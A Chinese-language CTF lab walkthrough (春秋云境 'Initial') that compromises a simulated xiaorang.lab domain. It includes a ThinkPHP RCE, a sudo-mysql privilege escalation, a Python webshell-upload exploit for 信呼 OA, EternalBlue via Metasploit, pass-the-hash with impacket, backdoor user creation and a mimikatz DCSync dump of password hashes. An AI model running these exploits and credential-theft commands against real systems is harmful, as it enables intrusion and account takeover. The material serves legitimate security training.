春秋云境 Initial

flag01

1
2
3
4
5
6
39.99.141.147:80 open
39.99.141.147:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.141.147      code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.99.141.147 poc-yaml-thinkphp5023-method-rce poc1

直接就扫到tp的洞了

image-20240820155252858

发现www-data权限

image-20240820155528465

利用mysql提权

1
2
3
sudo mysql -e '\! whoami'

sudo mysql -e '\! cat /root/f*/f*'

flag02

1
2
3
4
5
6
7
8
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.1.15  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe26:a581  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:26:a5:81  txqueuelen 1000  (Ethernet)
        RX packets 134555  bytes 188525088 (188.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 56675  bytes 12946270 (12.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
1
./fs -h 172.22.1.1/24 -o result.txt

结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
172.22.1.2:88 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:139 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:135 open
172.22.1.18:135 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.18:445 open
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

搭建代理

1
./gost -L=:10000 &

先看看这个信呼oa,有弱口令

1
admin/admin123

利用后台漏洞上传shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# 1.php为webshell

# 需要修改以下内容:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

记得自己写个1.php的马子,蚁剑连接

1
C:\Users\Administrator\flag> type flag02.txt

flag03

172.22.1.21是个ms17-010,上msf打就完事了

1
proxychains4 msfconsole 2>/dev/null
1
2
3
4
5
6
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.1.21
run

然后等着拿shell

1
2
3
4
hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

横向上去

1
proxychains4 impacket-smbexec -hashes :48f6da83eb89a4da8a1cc963b855a799 ./administrator@172.22.1.21 -codec gbk

没找到flag,加个用户上去

1
2
net user Chu0 whoami@666 /add
net localgroup administrators Chu0 /add

bloodhound收集信息

image-20240820162234549

所以直接dump域管哈希,横向过去拿到域控的flag

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
1
2
3
4
5
6
7
8
9
10
11
12
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   075b7ba049ee9b65eb3aea0fb13440e3        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  eca40798d7ca35d5b2f0ecb7217a68a5        4096
1108    XIAORANG-WIN7$  c7631dbcd38dac582e8c891880c40517        4096

横向域管

1
proxychains4 impacket-smbexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2 -codec gbk
1
type c:\users\administrator\flag\flag03.txt